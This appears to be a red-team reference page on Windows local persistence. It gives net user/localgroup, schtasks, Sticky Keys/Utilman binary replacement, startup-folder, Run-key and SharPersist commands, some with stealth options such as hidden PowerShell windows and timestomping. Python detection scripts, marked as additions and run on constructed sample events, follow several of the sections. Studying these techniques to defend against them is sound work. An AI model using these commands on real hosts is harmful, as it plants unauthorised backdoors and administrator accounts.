Local persistence

Last updated 3 years ago

A number of techniques can be employed to maintain persistence on a Windows system, that is, to keep access to the system across restarts or other forms of interruption. For a more comprehensive list of the persistence techniques that can be employed, refer to the Persistence tactic (TA0003) in the MITRE ATT&CK matrices.

Some of the techniques mentioned below can be accomplished through Cobalt Strike's execute-assembly (or InlineExecute-Assembly) using the SharPersist C# utility.

The forensic artefacts left by some of the persistence techniques detailed below are covered in the [DFIR] Windows - TTPs analysis - Local persistence note.

Local Administrator account

ATT&CK: T1136.001
Persistence type: Remote access.
Privilege level required: Administrator.
Monitoring possibilities: Windows default Security events. Windows API monitoring.

The following net user and net localgroup commands can be used to create a local account and add it to the local Administrators group (directly, or periodically through a scheduled task):

# Creates a new local account.
net user <USERNAME> <PASSWORD> /add

# Adds the account to the local Administrators group (English and French group names).
net localgroup Administrators <USERNAME> /add
net localgroup Administrateurs <USERNAME> /add

# Defines a scheduled task, running as SYSTEM, that creates the local user and adds it to the local Administrators group every <PERIODICITY> units of the chosen schedule type.
# The valid range of <PERIODICITY> depends on the schedule type (minute, hourly, daily, weekly, or monthly): 1 - 1439 for minutes, 1 - 23 for hours, 1 - 365 for days, 1 - 52 for weeks, or 1 - 12 for months.
# To avoid a warning on the password length (which may require user interaction), the password specified should be shorter than 14 characters.
schtasks /create /tn "<TASK_NAME>" /tr "cmd /c net user <USERNAME> <PASSWORD> /add && net localgroup Administrators <USERNAME> /add" /sc <minute | hourly | daily | weekly | monthly> /mo <PERIODICITY> /RU "NT AUTHORITY\SYSTEM"
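The "Windows default Security events" listed as a monitoring possibility above are events 4720 (a user account was created) and 4732 (a member was added to a security-enabled local group). The following detection logic, added here as an example and not part of the original note, correlates the two on a host within a short window and matches the group by its well-known SID (S-1-5-32-544) so that the rule works whatever the localized group name (Administrators, Administrateurs). The sample events are constructed records shaped after the EventData fields of those two event IDs, not real telemetry.

```python
"""Correlate Security events for a local account created and then added to the
local Administrators group, the trace left by the net user / net localgroup
commands above.

Added detection example, not part of the original note. SAMPLE_EVENTS are
constructed records shaped after the EventData fields of event 4720 (user
account created) and 4732 (member added to a security-enabled local group)."""

from datetime import datetime

# Well-known SID of BUILTIN\Administrators, independent of the display language.
BUILTIN_ADMINISTRATORS_SID = "S-1-5-32-544"

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 4720, "TimeCreated": "2024-03-01T10:00:05", "Computer": "WS01",
     "SubjectUserName": "alice", "TargetUserName": "svc_backup",
     "TargetSid": "S-1-5-21-1111-2222-3333-1105"},
    {"EventID": 4732, "TimeCreated": "2024-03-01T10:00:07", "Computer": "WS01",
     "SubjectUserName": "alice", "TargetSid": BUILTIN_ADMINISTRATORS_SID,
     "MemberName": "-", "MemberSid": "S-1-5-21-1111-2222-3333-1105"},
    {"EventID": 4720, "TimeCreated": "2024-03-01T11:30:00", "Computer": "WS02",
     "SubjectUserName": "helpdesk", "TargetUserName": "intern01",
     "TargetSid": "S-1-5-21-1111-2222-3333-1200"},
    # Added to Remote Desktop Users (S-1-5-32-555), not Administrators: no alert.
    {"EventID": 4732, "TimeCreated": "2024-03-01T11:30:02", "Computer": "WS02",
     "SubjectUserName": "helpdesk", "TargetSid": "S-1-5-32-555",
     "MemberName": "-", "MemberSid": "S-1-5-21-1111-2222-3333-1200"},
]


def _when(event):
    return datetime.fromisoformat(event["TimeCreated"])


def find_new_local_admins(events, window_seconds=600):
    """Return one alert per account created (4720) and then added to
    BUILTIN\\Administrators (4732) on the same host within window_seconds."""
    created = {}   # (host, account SID) -> the 4720 event
    alerts = []
    for ev in sorted(events, key=_when):
        if ev["EventID"] == 4720:
            created[(ev["Computer"], ev["TargetSid"])] = ev
        elif ev["EventID"] == 4732 and ev["TargetSid"] == BUILTIN_ADMINISTRATORS_SID:
            # 4732 carries the member as a SID (MemberName is usually "-").
            origin = created.get((ev["Computer"], ev["MemberSid"]))
            if origin is None:
                continue
            delay = (_when(ev) - _when(origin)).total_seconds()
            if delay <= window_seconds:
                alerts.append({"host": ev["Computer"],
                               "account": origin["TargetUserName"],
                               "created_by": origin["SubjectUserName"],
                               "added_by": ev["SubjectUserName"],
                               "delay_s": delay})
    return alerts


if __name__ == "__main__":
    for a in find_new_local_admins(SAMPLE_EVENTS):
        print(f"[ALERT] {a['host']}: local account {a['account']} added to "
              f"Administrators {a['delay_s']:.0f}s after creation by {a['created_by']}")
```

The window is deliberately short: the scheduled-task variant above re-creates the account at every trigger, so the same host will raise the alert repeatedly, which is itself a useful signal of a periodic task.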

Sticky Keys or Utilman backdoors

ATT&CK: T1546.008
Persistence type: Remote access.
Privilege level required: Administrator.
Monitoring possibilities: Non-default specific DACL on the sethc.exe and utilman.exe files to raise an alert upon modification. Windows API monitoring.

Both the Sticky Keys (sethc.exe) and Utilman (utilman.exe) utilities can be launched from the logon screen, before authentication, as NT AUTHORITY\SYSTEM. Graphical access to the host's logon prompt is needed in order to make use of this backdoor mechanism. To leverage a Sticky Keys or Utilman backdoor remotely:

  • RDP must be enabled and the RDP service reachable over the network. Refer to the Activate RDP and Windows Firewall sections of the present note to activate RDP and configure a rule allowing inbound RDP access on the local host.

  • RDP's Network Level Authentication (NLA) security mechanism must be disabled if no valid credentials are known.

To access a host remotely over RDP, the user must hold the SeRemoteInteractivePrivilege, granted by default to the members of the host's Remote Desktop Users local group. The following net localgroup commands can be used to add the specified user to this group (English and French group names):

net localgroup "Remote Desktop Users" <USERNAME> /add
net localgroup "Utilisateurs du Bureau à distance" <USERNAME> /add

# Connect over RDP from Linux (-k selects the keyboard layout).
rdesktop -k fr -g 90% -d '<DOMAIN>' -u '<USERNAME>' -p '<PASSWORD>' <HOSTNAME | IP>

sethc.exe is launched by pressing the Shift key five times, and utilman.exe can be started with the Win + U keys. Overwriting both binaries with a copy of cmd.exe (%ComSpec%) makes a SYSTEM command prompt reachable from the logon screen:

copy %ComSpec% %SystemRoot%\System32\sethc.exe
copy %ComSpec% %SystemRoot%\System32\utilman.exe
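Besides the DACL-based alerting listed above, a periodic integrity check catches the copy-over after the fact: a backdoored sethc.exe or utilman.exe is byte-identical to cmd.exe, and in any case no longer matches the digest recorded on a clean host of the same build. The following script is an added example, not part of the original note; hash_system32() reads the real files on a Windows host, while find_replaced_binaries() holds the comparison logic and is exercised here on constructed digests derived from placeholder bytes.

```python
"""Integrity check for the accessibility binaries the logon screen launches as
SYSTEM before authentication (sethc.exe and utilman.exe, as covered above).

Added example, not part of the original note. Reports an accessibility binary
that is byte-identical to cmd.exe or that differs from a recorded baseline."""

import hashlib
import os

# Accessibility binaries discussed in the note; extend the tuple as needed.
ACCESSIBILITY_BINARIES = ("sethc.exe", "utilman.exe")
# The shell the backdoor copies over them (%ComSpec%).
SHELL_BINARY = "cmd.exe"


def sha256_of(path):
    """SHA-256 hex digest of a file, read in 1 MiB chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_system32(system_root=None):
    """Digest the monitored binaries under %SystemRoot%\\System32 (Windows only)."""
    root = system_root or os.environ.get("SystemRoot", r"C:\Windows")
    digests = {}
    for name in ACCESSIBILITY_BINARIES + (SHELL_BINARY,):
        path = os.path.join(root, "System32", name)
        if os.path.isfile(path):
            digests[name] = sha256_of(path)
    return digests


def find_replaced_binaries(digests, known_good=None):
    """Return (binary, reason) pairs for accessibility binaries that look replaced.

    digests:    {file name: sha256 hex}, as produced by hash_system32().
    known_good: optional {file name: sha256 hex} baseline recorded from a clean
                host with the same OS build (digests change with patching)."""
    findings = []
    shell_digest = digests.get(SHELL_BINARY)
    for name in ACCESSIBILITY_BINARIES:
        digest = digests.get(name)
        if digest is None:
            continue  # missing file: a separate check, not a replacement
        if shell_digest is not None and digest == shell_digest:
            findings.append((name, f"byte-identical to {SHELL_BINARY}"))
        elif known_good and name in known_good and digest != known_good[name]:
            findings.append((name, "digest differs from the recorded baseline"))
    return findings


# Constructed digests (derived from placeholder bytes, not from real binaries).
SAMPLE_DIGESTS = {
    "cmd.exe": hashlib.sha256(b"placeholder cmd.exe").hexdigest(),
    "sethc.exe": hashlib.sha256(b"placeholder cmd.exe").hexdigest(),  # copied over
    "utilman.exe": hashlib.sha256(b"placeholder utilman.exe v2").hexdigest(),
}
SAMPLE_BASELINE = {
    "sethc.exe": hashlib.sha256(b"placeholder sethc.exe").hexdigest(),
    "utilman.exe": hashlib.sha256(b"placeholder utilman.exe").hexdigest(),
}

if __name__ == "__main__":
    for binary, reason in find_replaced_binaries(SAMPLE_DIGESTS, SAMPLE_BASELINE):
        print(f"[ALERT] {binary}: {reason}")
```

The baseline has to be refreshed after each cumulative update, otherwise every patched host reports a "differs from baseline" finding; the byte-identical check has no such dependency and is the one to keep when no baseline is maintained.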

Windows startup folders

ATT&CK: T1547.001
Persistence type: Code execution.
Privilege level required: User or Administrator, depending on the startup folder targeted.
Monitoring possibilities: Non-default specific DACL on the startup folders to raise an alert upon file creation. Periodic review / validation of the startup folder entries. Windows API monitoring.

The Windows startup folders contain shortcut link files (.lnk) that are executed whenever any user logs in (All Users startup folder) or when the associated user logs in (per-user startup folder).

The startup folders are located at the following paths:

# All Users startup folder.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

# Per-user startup folder.
C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

A shortcut link file can be created manually through Windows Explorer:

# In the folder in which the shortcut link should be created:
Right click -> New -> Shortcut -> Enter the <BINARY_PATH> and optional <ARGUMENTS> -> Next -> Enter the shortcut link file name <LNK_FILE_NAME> -> Finish

# The appearance and behaviour of the created shortcut link can be customized:
Right click on the shortcut link file -> Properties
  -> Optionally specify a custom working directory -> Start in: <DIRECTORY_FULL_PATH>
  -> Run: Minimized
  -> Change Icon... -> Select the icon displayed for the file.

PowerShell can also be used to create and customize a shortcut link file:

$WShell = New-Object -ComObject WScript.Shell
$Shortcut = $WShell.CreateShortcut("<LNK_FILE_NAME>")
$Shortcut.TargetPath = "<BINARY_PATH>"
$Shortcut.Arguments = "<ARGUMENTS>"
$Shortcut.WorkingDirectory = "<DIRECTORY_FULL_PATH>"
$Shortcut.IconLocation = "<ICON_FILE_PATH>"
# 7 = Minimized window.
$Shortcut.WindowStyle = 7
$Shortcut.Save()

SharPersist supports persistence through the current user's startup folder. SharPersist presents the advantage of performing timestomping on the created shortcut link file and setting the file icon to Internet Explorer for increased stealth.

# Lists the entries in the current user's startup folder.
SharPersist.exe -t startupfolder -m list

# Adds a lnk file in the current user's startup folder executing the specified executable.
SharPersist.exe -t startupfolder -c "<BINARY_PATH>" [-a "<ARGUMENTS>"] -f "<LNK_FILE_NAME>" -m add

# Removes the specified startup folder entry.
SharPersist.exe -t startupfolder -f "<LNK_FILE_NAME>" -m remove

ASEP registry keys

ATT&CK: T1547.001, T1547.004
Persistence type: Code execution.
Privilege level required: User or Administrator.
Monitoring possibilities: Windows default Microsoft-Windows-Shell-Core%4Operational.evtx events for the Run / RunOnce registry keys (starting from Windows 10 and Windows Server 2016). Non-default specific DACL on the ASEP registry keys to raise alerts upon operations on the keys (Create Subkey, Set Value, ...). Periodic review / validation of the ASEP registry keys configured. Windows API monitoring.

A number of registry keys, known as Auto-Start Extensibility Points (ASEP) registry keys, are run whenever the system is booted or a specific user logs in. The ASEP keys under HKEY_LOCAL_MACHINE (HKLM) are run every time the system is started, while the ASEP keys under HKEY_CURRENT_USER (HKCU) are only executed when the user associated with the keys logs on to the system.

For more information on ASEP keys, including a more comprehensive list of ASEP registry keys, refer to the [DFIR] Windows - TTPs analysis - Local persistence note (ASEP registry keys section).

RunOnce / Run / RunOnceEx

Among the most well-known ASEP keys, entries in the RunOnce and Run keys are executed respectively once or at every trigger (system startup or user logon, depending on whether the key is under HKLM or HKCU).

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

SharPersist supports persistence through a number of ASEP keys, specified with the -k "<KEY_SPECIFIER>" parameter:

  • hklmrun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run

  • hklmrunonce: HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

  • hklmrunonceex: HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

  • hkcurun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run

  • hkcurunonce: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

  • logonscript: HKCU\Environment, value name UserInitMprLogonScript. Windows logon script executed at logon, which can also be set at the domain level. May overwrite a legitimate logon script.

  • stickynotes: HKCU\Software\Microsoft\Windows\CurrentVersion\Run, value name RESTART_STICKY_NOTES. Does not apply to Windows 10+. The RESTART_STICKY_NOTES value is set by the Sticky Notes utility to persist across reboots, and the utility re-sets it each time it is opened.

  • userinit: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, value name Userinit.

SharPersist.exe -t reg [-o env] -c "<BINARY_PATH>" [-a "<ARGUMENTS>"] -k "<KEY_SPECIFIER>" -v "<KEY_NAME>" -m add
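The "periodic review / validation of the ASEP registry keys" listed as a monitoring possibility is easiest to automate from a `reg export` of the locations above. The following script is an added example, not part of the original note or of SharPersist: it parses the .reg text format (REG_SZ values only) and flags values under the Run / RunOnce / RunOnceEx keys, the HKCU\Environment logon script and the Winlogon Userinit value, on three heuristics a reviewer applies by hand: a value in a location that should normally be absent or at its default, a command launched from a user-writable directory, and a hidden or encoded PowerShell one-liner, which is decoded for the analyst. SAMPLE_REG is a constructed export; its -Enc payload decodes to a harmless Start-Sleep.

```python
"""Audit Auto-Start Extensibility Point (ASEP) values from a `reg export` file.

Added example, not part of the original note. Parses REG_SZ values from the
.reg text format and flags autostart entries on simple review heuristics."""

import base64
import re

# Constructed export (not from a real host); the -Enc payload is "Start-Sleep".
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="%windir%\\system32\\SecurityHealthSystray.exe"
"Updater"="\"C:\\Users\\Public\\update.exe\" -s"

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"svc"="powershell.exe -NoP -NonI -W Hidden -Enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwAA=="

[HKEY_CURRENT_USER\Environment]
"UserInitMprLogonScript"="C:\\Users\\bob\\AppData\\Local\\Temp\\logon.bat"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\\Windows\\system32\\userinit.exe,"
"Shell"="explorer.exe"
'''

VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')
ASEP_KEY_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce|RunOnceEx)(\\|$)", re.I)
USER_WRITABLE_RE = re.compile(r"\\(Users|Temp|ProgramData|AppData)\\", re.I)
HIDDEN_WINDOW_RE = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
ENCODED_CMD_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def _unescape(s):
    # .reg escapes backslashes and double quotes with a backslash.
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text):
    """Return {key path: {value name: string data}} for REG_SZ values."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        if current is None:
            continue
        if line.startswith("@="):
            name, data = "(Default)", line[2:]
        elif (m := VALUE_RE.match(line)):
            name, data = _unescape(m.group(1)), m.group(2)
        else:
            continue
        if len(data) >= 2 and data[0] == data[-1] == '"':  # hex:/dword: skipped
            keys[current][name] = _unescape(data[1:-1])
    return keys


def decode_encoded_command(command):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE)."""
    m = ENCODED_CMD_RE.search(command)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def audit_asep(keys):
    """Flag suspicious autostart values; returns a list of finding dicts."""
    findings = []
    for key, values in keys.items():
        leaf = key.rsplit("\\", 1)[-1].lower()
        for name, command in values.items():
            reasons = []
            is_logon_script = leaf == "environment" and name.lower() == "userinitmprlogonscript"
            is_userinit = leaf == "winlogon" and name.lower() == "userinit"
            if is_logon_script:
                reasons.append("logon script set through HKCU\\Environment (normally absent)")
            if is_userinit:
                entries = [e.strip() for e in command.split(",") if e.strip()]
                if len(entries) != 1 or not entries[0].lower().endswith("\\userinit.exe"):
                    reasons.append("Userinit changed from its single default userinit.exe entry")
            if ASEP_KEY_RE.search(key) or is_logon_script or is_userinit:
                if USER_WRITABLE_RE.search(command):
                    reasons.append("launched from a user-writable directory")
                if HIDDEN_WINDOW_RE.search(command):
                    reasons.append("hidden PowerShell window")
                decoded = decode_encoded_command(command)
                if decoded is not None:
                    reasons.append(f"encoded PowerShell command, decodes to: {decoded}")
            if reasons:
                findings.append({"key": key, "value": name, "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_asep(parse_reg_export(SAMPLE_REG)):
        print(f"[{f['key']}] {f['value']} = {f['command']}")
        for r in f["reasons"]:
            print("    -", r)
```

On the sample, SecurityHealth and the default Userinit value pass, while the Public-folder updater, the encoded RunOnce one-liner and the Temp-folder logon script are reported. Entries in RunOnceEx live in numbered subkeys, which is why the key pattern also accepts subkeys of the three Run locations.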

Scheduled tasks

ATT&CK: T1053
Persistence type: Code execution.
Privilege level required: User or Administrator.
Monitoring possibilities: Windows default Microsoft-Windows-TaskScheduler%4Operational.evtx events. Periodic review / validation of the scheduled tasks configured. Windows API monitoring.

# Examples of <TASK_COMMAND> using the Windows built-in cmd.exe or PowerShell:
cmd.exe /c '<COMMAND> <COMMAND_ARGS>'
%ComSpec% /c '<COMMAND> <COMMAND_ARGS>'
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -C '<COMMAND> <COMMAND_ARGS>'
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc <ENCODED_BASE64_CMD>
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W Hidden -Enc <ENCODED_BASE64_CMD>

# Creates a scheduled task running <TASK_COMMAND> as SYSTEM (here once, at the given date and time), locally or on the remote host specified with /S.
schtasks /create /tn "<TASK_NAME>" /tr "<TASK_COMMAND>" /sc once /sd <MM/DD/YYYY> /st <HH:MM:SS> /V1 /Z /RU "NT AUTHORITY\SYSTEM" /S <IP | HOSTNAME>

# Validates the creation and status of the scheduled task, runs it on demand, or deletes it.
schtasks /query /tn "<TASK_NAME>" /S <IP | HOSTNAME>
schtasks /run /tn "<TASK_NAME>" /S <IP | HOSTNAME>
schtasks /delete /tn "<TASK_NAME>" /S <IP | HOSTNAME>
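Task creation is also recorded in the Security log as event 4698 ("a scheduled task was created") when object-access auditing for the Task Scheduler is enabled, and that event embeds the full task definition XML in its TaskContent field. The following triage logic is an added example, not part of the original note: it parses the XML and scores the task on the traits the schtasks examples above exhibit (principal SYSTEM, hidden, and an action that creates a local account, touches the local Administrators group, or runs hidden/encoded PowerShell). SAMPLE_4698 is a constructed event, not real telemetry.

```python
"""Triage Security event 4698 ("a scheduled task was created") by parsing the
task definition XML carried in its TaskContent field.

Added example, not part of the original note. SAMPLE_4698 is constructed."""

import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
LOCAL_SYSTEM_SID = "S-1-5-18"

# (pattern over "command arguments", reason); "administr" also matches the
# French "Administrateurs" group name used elsewhere in the note.
SUSPICIOUS_ACTIONS = [
    (re.compile(r"\bnet1?(\.exe)?\s+user\b.*\s/add\b", re.I), "creates a local account"),
    (re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administr", re.I), "modifies the local Administrators group"),
    (re.compile(r"powershell.*(-e(nc|ncodedcommand)?\s+\S+|-w(indowstyle)?\s+hidden)", re.I), "runs hidden or encoded PowerShell"),
]

SAMPLE_4698 = {  # constructed EventData of a 4698 event
    "SubjectUserName": "jdoe",
    "TaskName": "\\Microsoft\\Windows\\Maintenance\\CacheRefresh",
    "TaskContent": """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger><StartBoundary>2024-03-01T10:00:00</StartBoundary><ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal>
  </Principals>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec><Command>cmd.exe</Command><Arguments>/c net user svc_cache Placeh0lder /add &amp;&amp; net localgroup Administrators svc_cache /add</Arguments></Exec>
  </Actions>
</Task>""",
}


def parse_task_content(xml_text):
    """Return the security-relevant fields of a Task Scheduler XML definition."""
    # TaskContent keeps its encoding="UTF-16" declaration although the event is
    # handed over as text; drop the declaration before parsing the string.
    root = ET.fromstring(re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text))

    def text(path):
        return root.findtext(path, default="", namespaces=TASK_NS).strip()

    actions = []
    for ex in root.findall("t:Actions/t:Exec", TASK_NS):
        cmd = ex.findtext("t:Command", default="", namespaces=TASK_NS)
        args = ex.findtext("t:Arguments", default="", namespaces=TASK_NS)
        actions.append(f"{cmd} {args}".strip())
    return {
        "user_id": text("t:Principals/t:Principal/t:UserId"),
        "run_level": text("t:Principals/t:Principal/t:RunLevel"),
        "hidden": text("t:Settings/t:Hidden").lower() == "true",
        "triggers": [t.tag.rsplit("}", 1)[-1] for t in root.findall("t:Triggers/*", TASK_NS)],
        "actions": actions,
    }


def triage_task_creation(event):
    """Score a 4698 event; every matched trait adds one reason."""
    task = parse_task_content(event["TaskContent"])
    reasons = []
    if task["user_id"] == LOCAL_SYSTEM_SID:
        reasons.append("runs as NT AUTHORITY\\SYSTEM")
    if task["hidden"]:
        reasons.append("hidden from the Task Scheduler view")
    for action in task["actions"]:
        for rx, why in SUSPICIOUS_ACTIONS:
            if rx.search(action):
                reasons.append(f"action {why}: {action}")
    return {"task": event["TaskName"], "created_by": event["SubjectUserName"],
            "details": task, "reasons": reasons, "score": len(reasons)}


if __name__ == "__main__":
    result = triage_task_creation(SAMPLE_4698)
    print(f"{result['task']} created by {result['created_by']} (score {result['score']})")
    for r in result["reasons"]:
        print("  -", r)
```

The same parser applies to the Microsoft-Windows-TaskScheduler%4Operational.evtx "task registered" events listed above and to the task XML files under %SystemRoot%\System32\Tasks, so one piece of logic serves both live detection and a periodic review of registered tasks.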

Windows services

ATT&CK: T1543.003
Persistence type: Code execution.
Privilege level required: Administrator.
Monitoring possibilities: Windows default System.evtx and Security.evtx (since Windows Server 2016 and Windows 10) events. Periodic review / validation of the services configured. Windows API monitoring.

WMI subscription

TODO

https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf

DLL hijacking

TODO

https://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/


References

MITRE ATT&CK matrices, Persistence tactic (TA0003)

MITRE ATT&CK techniques referenced above: T1136.001, T1546.008, T1547.001, T1547.004, T1053, T1543.003

InlineExecute-Assembly

SharPersist

https://github.com/mandiant/SharPersist/blob/master/Brett%20Hawkins%20SharPersist%20DerbyCon%202019.pdf

https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/

https://h4wkst3r.blogspot.com/2018/05/persistence-with-sticky-notes-registry.html

https://www.ired.team/offensive-security/persistence/windows-logon-helper

Winlogon registry keys: